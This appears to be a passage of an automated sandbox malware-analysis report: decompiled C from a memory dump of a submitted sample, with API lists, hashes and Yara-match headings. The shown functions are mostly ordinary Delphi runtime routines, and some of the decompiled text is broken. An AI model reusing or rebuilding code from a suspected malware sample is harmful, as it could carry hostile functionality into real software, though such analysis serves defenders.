                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				int _t27;
                                                    				void* _t40;
                                                    				int _t41;
                                                    				int _t50;
                                                    
                                                    				_t50 = _t41;
                                                    				_t49 = __edx;
                                                    				_t40 = __eax;
                                                    				if(L0044DEB4(__eax) == 0) {
                                                    					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                    				}
                                                    				_v8 = 0;
                                                    				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                    					_t27 = GetMenuItemID(_t49, _t50);
                                                    					_t51 = _t27;
                                                    					if(_t27 != 0xffffffff) {
                                                    						_v8 = L0044DD30(_t40, 0, _t51);
                                                    					}
                                                    				} else {
                                                    					_t49 = GetSubMenu(_t49, _t50);
                                                    					_v8 = L0044DD30(_t40, 1, _t37);
                                                    				}
                                                    				if(_v8 == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					 *_a12 = 0;
                                                    					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                    					return L00409F88(_a12, _t49);
                                                    				}
                                                    			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ItemStateString
                                                    • String ID:
                                                    • API String ID: 306270399-0
                                                    • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                    • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 55%
                                                    			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				void* _t19;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t36;
                                                    				struct HINSTANCE__* _t40;
                                                    				void* _t42;
                                                    				void* _t43;
                                                    				intOrPtr _t44;
                                                    
                                                    				_t42 = _t43;
                                                    				_t44 = _t43 + 0xfffffff8;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t42);
                                                    				_push(0x474cbf);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t44;
                                                    				_push(_t42);
                                                    				_push(0x474c8c);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t44;
                                                    				_t40 = LoadLibraryA(E00404E80(_v8));
                                                    				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
                                                    				if(_t19 != 0) {
                                                    				}
                                                    				FreeResource(_t19);
                                                    				FreeLibrary(_t40);
                                                    				_pop(_t35);
                                                    				 *[fs:eax] = _t35;
                                                    				_pop(_t36);
                                                    				 *[fs:eax] = _t36;
                                                    				_push(0x474cc6);
                                                    				return E004049E4( &_v12, 2);
                                                    			}

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C54
                                                    • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                    • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C77
                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C7D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibraryResource$FindLoad
                                                    • String ID:
                                                    • API String ID: 622515136-0
                                                    • Opcode ID: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                    • Opcode Fuzzy Hash: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00459634(void* __eax, void* __ecx, char __edx) {
                                                    				char _v12;
                                                    				struct HWND__* _v20;
                                                    				int _t17;
                                                    				void* _t27;
                                                    				struct HWND__* _t33;
                                                    				void* _t35;
                                                    				void* _t36;
                                                    				long _t37;
                                                    
                                                    				_t37 = _t36 + 0xfffffff8;
                                                    				_t27 = __eax;
                                                    				_t17 =  *0x49ebb8; // 0x0
                                                    				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                                    					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                                    						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                                    						_v12 = __edx;
                                                    						EnumWindows(E004595C4, _t37);
                                                    						_t5 = _t27 + 0x90; // 0x0
                                                    						_t17 =  *_t5;
                                                    						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                                    							_t33 = GetWindow(_v20, 3);
                                                    							_v20 = _t33;
                                                    							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                                    								_v20 = 0xfffffffe;
                                                    							}
                                                    							_t10 = _t27 + 0x90; // 0x0
                                                    							_t17 =  *_t10;
                                                    							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                                    							if(_t35 >= 0) {
                                                    								do {
                                                    									_t13 = _t27 + 0x90; // 0x0
                                                    									_t17 = SetWindowPos(E0041AC6C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                                    									_t35 = _t35 - 1;
                                                    								} while (_t35 != 0xffffffff);
                                                    							}
                                                    						}
                                                    					}
                                                    					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                                    				}
                                                    				return _t17;
                                                    			}

                                                    APIs
                                                    • EnumWindows.USER32(004595C4), ref: 00459669
                                                    • GetWindow.USER32(00000003,00000003), ref: 00459681
                                                    • GetWindowLongA.USER32 ref: 0045968E
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004596CD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$EnumLongWindows
                                                    • String ID:
                                                    • API String ID: 4191631535-0
                                                    • Opcode ID: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                    • Instruction ID: e023c87b117193a46b59b10cd2d90065ddfa048c4e1cca94785ca85305bb7b15
                                                    • Opcode Fuzzy Hash: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                    • Instruction Fuzzy Hash: 49117331609210AFD711EB28CC85F9673D4AB05765F18017AFDA8AF2D3C378AC49C75A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                    				CHAR* _v8;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t18;
                                                    				void* _t23;
                                                    				CHAR* _t24;
                                                    				void* _t25;
                                                    				struct HRSRC__* _t29;
                                                    				void* _t30;
                                                    				struct HINSTANCE__* _t31;
                                                    				void* _t32;
                                                    
                                                    				_v8 = _t24;
                                                    				_t31 = __edx;
                                                    				_t23 = __eax;
                                                    				_t29 = FindResourceA(__edx, _v8, _a4);
                                                    				 *(_t23 + 0x10) = _t29;
                                                    				_t33 = _t29;
                                                    				if(_t29 == 0) {
                                                    					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
                                                    					_pop(_t24);
                                                    				}
                                                    				_t5 = _t23 + 0x10; // 0x41e23c
                                                    				_t30 = LoadResource(_t31,  *_t5);
                                                    				 *(_t23 + 0x14) = _t30;
                                                    				_t34 = _t30;
                                                    				if(_t30 == 0) {
                                                    					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
                                                    				}
                                                    				_t7 = _t23 + 0x10; // 0x41e23c
                                                    				_push(SizeofResource(_t31,  *_t7));
                                                    				_t8 = _t23 + 0x14; // 0x41dd60
                                                    				_t18 = LockResource( *_t8);
                                                    				_pop(_t25);
                                                    				return L0041DD20(_t23, _t25, _t18);
                                                    			}

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0041E1AF
                                                    • LoadResource.KERNEL32(?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1C9
                                                    • SizeofResource.KERNEL32(?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1E3
                                                    • LockResource.KERNEL32(0041DD60,00000000,?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1ED
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                    • Opcode Fuzzy Hash: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00401618(void* __eax, void** __ecx, void* __edx) {
                                                    				void* _t4;
                                                    				void** _t9;
                                                    				void* _t13;
                                                    				void* _t14;
                                                    				long _t16;
                                                    				void* _t17;
                                                    
                                                    				_t9 = __ecx;
                                                    				_t14 = __edx;
                                                    				_t17 = __eax;
                                                    				 *(__ecx + 4) = 0x100000;
                                                    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
                                                    				_t13 = _t4;
                                                    				 *_t9 = _t13;
                                                    				if(_t13 == 0) {
                                                    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
                                                    					_t9[1] = _t16;
                                                    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
                                                    					 *_t9 = _t4;
                                                    				}
                                                    				if( *_t9 != 0) {
                                                    					_t4 = E00401468(0x49e5ec, _t9);
                                                    					if(_t4 == 0) {
                                                    						VirtualFree( *_t9, 0, 0x8000);
                                                    						 *_t9 = 0;
                                                    						return 0;
                                                    					}
                                                    				}
                                                    				return _t4;
                                                    			}

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401636
                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 0040165B
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401681
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$Alloc$Free
                                                    • String ID: I
                                                    • API String ID: 3668210933-1966777607
                                                    • Opcode ID: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                    • Instruction ID: d5b131199f8cf9b3caee1c5a15836c0652bc1ac5bd3422d56553b580ad17c722
                                                    • Opcode Fuzzy Hash: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                    • Instruction Fuzzy Hash: 6DF044B17403206BEB315AAA4CC5F133AD89B45794F154176BE08BF3D9D6B99800866C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00438CE0(struct HWND__* __eax, void* __ecx) {
                                                    				intOrPtr _t9;
                                                    				signed int _t16;
                                                    				struct HWND__* _t19;
                                                    				DWORD* _t20;
                                                    
                                                    				_t17 = __ecx;
                                                    				_push(__ecx);
                                                    				_t19 = __eax;
                                                    				_t16 = 0;
                                                    				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                                    					_t9 =  *0x49eb28; // 0x0
                                                    					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
                                                    						_t16 = 0 | L00437E28(_t19, _t17) != 0x00000000;
                                                    					} else {
                                                    						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
                                                    					}
                                                    				}
                                                    				return _t16;
                                                    			}

                                                    APIs
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                    • GetPropA.USER32 ref: 00438D22
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                    • String ID:
                                                    • API String ID: 2582817389-0
                                                    • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                    • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00458F44(void* __ecx) {
                                                    				void* _t2;
                                                    				DWORD* _t7;
                                                    
                                                    				_t2 =  *0x49ebb8; // 0x0
                                                    				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                    					if( *0x49ebd0 == 0) {
                                                    						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
                                                    						 *0x49ebd0 = _t2;
                                                    					}
                                                    					if( *0x49ebcc == 0) {
                                                    						_t2 = CreateEventA(0, 0, 0, 0);
                                                    						 *0x49ebcc = _t2;
                                                    					}
                                                    					if( *0x49ebd4 == 0) {
                                                    						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
                                                    						 *0x49ebd4 = _t2;
                                                    					}
                                                    				}
                                                    				return _t2;
                                                    			}

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                    • SetWindowsHookExA.USER32 ref: 00458F6C
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                    • CreateThread.KERNEL32 ref: 00458FAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$CurrentEventHookWindows
                                                    • String ID:
                                                    • API String ID: 1195359707-0
                                                    • Opcode ID: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                    • Opcode Fuzzy Hash: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00460AA0() {
                                                    				signed int _t2;
                                                    				struct HDC__* _t5;
                                                    
                                                    				_t5 = GetDC(0);
                                                    				_t2 = GetDeviceCaps(_t5, 0xc);
                                                    				if(_t2 * GetDeviceCaps(_t5, 0xe) > 8) {
                                                    					 *0x49c08f = 0;
                                                    				} else {
                                                    					 *0x49c08f = 1;
                                                    				}
                                                    				return ReleaseDC(0, _t5);
                                                    			}

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00460AA4
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00460AAE
                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00460AB8
                                                    • ReleaseDC.USER32 ref: 00460AD8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                    • Opcode Fuzzy Hash: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr* _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int* _v24;
                                                    				signed int* _v28;
                                                    				signed int _v32;
                                                    				signed int* _v36;
                                                    				intOrPtr _v40;
                                                    				signed int _v44;
                                                    				intOrPtr _v48;
                                                    				char _v52;
                                                    				char _v84;
                                                    				signed int _v1620;
                                                    				signed int _t142;
                                                    				intOrPtr _t143;
                                                    				intOrPtr* _t144;
                                                    				intOrPtr _t147;
                                                    				signed char _t157;
                                                    				signed char _t158;
                                                    				signed int* _t165;
                                                    				signed int _t207;
                                                    				signed int _t208;
                                                    				void* _t209;
                                                    				intOrPtr _t224;
                                                    				intOrPtr _t225;
                                                    				intOrPtr _t226;
                                                    				intOrPtr _t227;
                                                    				signed int _t256;
                                                    				intOrPtr* _t258;
                                                    				void* _t260;
                                                    				void* _t261;
                                                    				intOrPtr _t262;
                                                    				void* _t276;
                                                    
                                                    				_t276 = __fp0;
                                                    				_t260 = _t261;
                                                    				_t262 = _t261 + 0xfffff9b0;
                                                    				_v12 = __ecx;
                                                    				_t258 = __edx;
                                                    				_v8 = __eax;
                                                    				_t224 =  *0x417dc0; // 0x417dc4
                                                    				E004053AC( &_v84, _t224);
                                                    				_push(_t260);
                                                    				_push(0x4787af);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t262;
                                                    				_v20 = 0;
                                                    				_t211 = 0;
                                                    				_push(_t260);
                                                    				_push(0x47878c);
                                                    				_push( *[fs:ecx]);
                                                    				 *[fs:ecx] = _t262;
                                                    				_t256 =  *(__edx + 1) & 0x000000ff;
                                                    				if(_t256 > 0x40) {
                                                    					_t211 =  *0x49d980; // 0x477e3c
                                                    					E0040D200(_t211, 1);
                                                    					E00404378();
                                                    				}
                                                    				if(_t256 == 0) {
                                                    					L25:
                                                    					_v52 =  &_v1620;
                                                    					_v48 = _v12 + 4;
                                                    					_v44 = _t256;
                                                    					_v40 = 0;
                                                    					_t225 =  *_v12;
                                                    					_t142 =  *_t258;
                                                    					if(0 != 4) {
                                                    						__eflags = 0 - 1;
                                                    						if(0 == 1) {
                                                    							__eflags = _t256;
                                                    							if(__eflags == 0) {
                                                    								__eflags = _a4;
                                                    								if(__eflags != 0) {
                                                    									_t142 = 3;
                                                    								}
                                                    							}
                                                    						}
                                                    					} else {
                                                    						if((_v1620 & 0x00000fff) == 9) {
                                                    							_t142 = 8;
                                                    						}
                                                    						 *_v12 = 0xfffffffd;
                                                    						_v48 = _v48 - 4;
                                                    						_v40 = _v40 + 1;
                                                    					}
                                                    					_push(0);
                                                    					_push( &_v84);
                                                    					_push(_a4);
                                                    					_push( &_v52);
                                                    					_push(_t142);
                                                    					_push(0);
                                                    					_t143 =  *0x49d770; // 0x49b500
                                                    					_push(_t143);
                                                    					_push(_t225);
                                                    					_t144 = _v8;
                                                    					_push(_t144);
                                                    					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
                                                    						E00478A5C();
                                                    					}
                                                    					_t207 = _v20;
                                                    					if(_t207 == 0) {
                                                    						L39:
                                                    						_t147 = 0;
                                                    						_pop(_t226);
                                                    						 *[fs:eax] = _t226;
                                                    						_push(0x478793);
                                                    						_t208 = _v20;
                                                    						if(_t208 == 0) {
                                                    							L41:
                                                    							return _t147;
                                                    						} else {
                                                    							goto L40;
                                                    						}
                                                    						do {
                                                    							L40:
                                                    							_t208 = _t208 - 1;
                                                    							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
                                                    							_push(_t147);
                                                    							L00417E14();
                                                    						} while (_t208 != 0);
                                                    						goto L41;
                                                    					} else {
                                                    						do {
                                                    							_t207 = _t207 - 1;
                                                    							_t148 = _t260 + _t207 * 8 - 0x250;
                                                    							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
                                                    							_t272 = _t227;
                                                    							if(_t227 != 0) {
                                                    								L00405950( *_t148,  *_t148, _t227, _t272);
                                                    							}
                                                    						} while (_t207 != 0);
                                                    						goto L39;
                                                    					}
                                                    				} else {
                                                    					_v24 = _a8;
                                                    					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
                                                    					_t209 = 0;
                                                    					do {
                                                    						_v28 = _v28 - 0x10;
                                                    						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
                                                    						_v16 = _t157 & 0x7f;
                                                    						_t158 = _t157 & 0x00000080;
                                                    						if(_v16 != 0xa) {
                                                    							__eflags = _v16 - 0x48;
                                                    							if(_v16 != 0x48) {
                                                    								__eflags = _t158;
                                                    								if(_t158 == 0) {
                                                    									__eflags = _v16 - 0xc;
                                                    									if(_v16 != 0xc) {
                                                    										 *_v28 = _v16;
                                                    										_v28[2] =  *_v24;
                                                    										__eflags = _v16 - 5;
                                                    										if(_v16 >= 5) {
                                                    											__eflags = _v16 - 7;
                                                    											if(_v16 <= 7) {
                                                    												_t93 =  &_v24;
                                                    												 *_t93 =  &(_v24[1]);
                                                    												__eflags =  *_t93;
                                                    												_v28[3] =  *_v24;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										__eflags =  *_v24 - 0x100;
                                                    										if( *_v24 != 0x100) {
                                                    											_t165 = _v24;
                                                    											 *_v28 =  *_t165;
                                                    											_v28[1] = _t165[1];
                                                    											_t211 = _v28;
                                                    											_v28[2] = _t165[2];
                                                    											_v28[3] = _t165[3];
                                                    											_v24 =  &(_v24[3]);
                                                    										} else {
                                                    											_v36 = _t260 + _v20 * 8 - 0x250;
                                                    											 *_v36 = L00405974(_v24[2], _t211);
                                                    											_v36[1] = 0;
                                                    											 *_v28 = 8;
                                                    											_v28[2] =  *_v36;
                                                    											_v20 = _v20 + 1;
                                                    										}
                                                    									}
                                                    									goto L23;
                                                    								}
                                                    								__eflags = _v16 - 0xc;
                                                    								if(_v16 == 0xc) {
                                                    									__eflags =  *( *_v24) - 0x100;
                                                    									if( *( *_v24) == 0x100) {
                                                    										_t211 = 8;
                                                    										E00411330( *_v24, 8,  *_v24, _t256, _t276);
                                                    									}
                                                    								}
                                                    								 *_v28 = _v16 | 0x00004000;
                                                    								_v28[2] =  *_v24;
                                                    								goto L23;
                                                    							} else {
                                                    								_v32 = _t260 + _v20 * 8 - 0x250;
                                                    								__eflags = _t158;
                                                    								if(_t158 == 0) {
                                                    									 *_v32 = L00405974( *_v24, _t211);
                                                    									__eflags = 0;
                                                    									 *(_v32 + 4) = 0;
                                                    									 *_v28 = 8;
                                                    									_v28[2] =  *_v32;
                                                    								} else {
                                                    									 *_v32 = L00405974( *( *_v24), _t211);
                                                    									 *(_v32 + 4) =  *_v24;
                                                    									 *_v28 = 0x4008;
                                                    									_v28[2] = _v32;
                                                    								}
                                                    								_v20 = _v20 + 1;
                                                    								L23:
                                                    								_t98 =  &_v24;
                                                    								 *_t98 =  &(_v24[1]);
                                                    								__eflags =  *_t98;
                                                    								goto L24;
                                                    							}
                                                    						} else {
                                                    							 *_v28 = 0xa;
                                                    							_v28[2] = 0x80020004;
                                                    						}
                                                    						L24:
                                                    						_t209 = _t209 + 1;
                                                    					} while (_t256 != _t209);
                                                    					goto L25;
                                                    				}
                                                    			}

                                                    Instruction addresses (per-line offset column, spilled from the decompilation above):
                                                    0x0047847c 0x0047847d 0x0047847f 0x00478488 0x0047848b 0x0047848d 0x00478493 0x00478499
                                                    0x004784a0 0x004784a1 0x004784a6 0x004784a9 0x004784ae 0x004784b1 0x004784b3 0x004784b4
                                                    0x004784b9 0x004784bc 0x004784bf 0x004784c6 0x004784c8 0x004784d5 0x004784da 0x004784da
                                                    0x004784e1 0x004786aa 0x004786b0 0x004786b9 0x004786bc 0x004786c4 0x004786ca 0x004786ce
                                                    0x004786d3 0x004786fd 0x00478700 0x00478702 0x00478704 0x00478706 0x0047870a 0x0047870c
                                                    0x0047870c 0x0047870a 0x00478704 0x004786d5 0x004786e4 0x004786e6 0x004786e6 0x004786ee
                                                    0x004786f4 0x004786f8 0x004786f8 0x00478711 0x00478716 0x0047871a 0x0047871e 0x0047871f
                                                    0x00478720 0x00478722 0x00478727 0x00478728 0x00478729 0x0047872c 0x00478734 0x00478739
                                                    0x00478739 0x0047873e 0x00478743 0x00478765 0x00478765 0x00478767 0x0047876a 0x0047876d
                                                    0x00478772 0x00478777 0x0047878b 0x0047878b 0x00000000 0x00000000 0x00000000 0x00478779
                                                    0x00478779 0x00478779 0x0047877a 0x00478781 0x00478782 0x00478787 0x00000000 0x00478745
                                                    0x00478745 0x00478745 0x00478746 0x0047874d 0x00478750 0x00478752 0x0047875c 0x0047875c
                                                    0x00478761 0x00000000 0x00478745 0x004784e7 0x004784ea 0x004784f8 0x004784fb 0x004784fd
                                                    0x004784fd 0x00478501 0x00478510 0x00478513 0x00478519 0x00478533 0x00478537 0x004785ad
                                                    0x004785af 0x004785f6 0x004785fa 0x00478675 0x0047867f 0x00478682 0x00478686 0x00478688
                                                    0x0047868c 0x0047868e 0x0047868e 0x0047868e 0x0047869a 0x0047869a 0x0047868c 0x004785fc
                                                    0x004785ff 0x00478604 0x00478644 0x0047864c 0x00478654 0x0047865a 0x0047865d 0x00478666
                                                    0x00478669 0x00478606 0x00478610 0x00478621 0x00478628 0x0047862e 0x0047863c 0x0047863f
                                                    0x0047863f 0x00478604 0x00000000 0x004785fa 0x004785b1 0x004785b5 0x004785bc 0x004785c1
                                                    0x004785cf 0x004785d4 0x004785d4 0x004785c1 0x004785e4 0x004785ee 0x00000000 0x00478539
                                                    0x00478543 0x00478546 0x00478548 0x00478587 0x0047858c 0x0047858e 0x00478594 0x004785a2
                                                    0x0047854a 0x00478559 0x00478563 0x00478569 0x00478575 0x00478575 0x004785a5 0x0047869d
                                                    0x0047869d 0x0047869d 0x0047869d 0x00000000 0x0047869d 0x0047851b 0x0047851e 0x00478527
                                                    0x00478527 0x004786a1 0x004786a1 0x004786a2 0x00000000 0x004784fd

                                                    APIs
                                                    • SysFreeString.OLEAUT32(?), ref: 00478782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
